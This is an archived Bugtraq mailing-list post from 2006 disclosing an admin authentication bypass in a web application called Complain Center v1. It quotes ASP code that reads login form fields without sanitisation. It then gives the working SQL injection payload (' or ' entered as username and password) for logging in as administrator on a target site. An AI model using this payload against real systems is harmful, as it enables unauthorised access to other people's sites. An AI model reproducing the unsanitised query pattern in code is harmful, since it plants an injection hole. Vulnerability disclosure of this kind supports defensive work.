[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
- From: ajannhwt@xxxxxxxxxxx
- Date: 14 Sep 2006 20:02:01 -0000
ENGLISH
# Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
# Author : ajann
# Exploit;
[CODE]
loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...
//Before join login page
http://[target]/[path]/login.asp
Username : ' or '
Password : ' or ' and Login Ok
# ajann,Turkey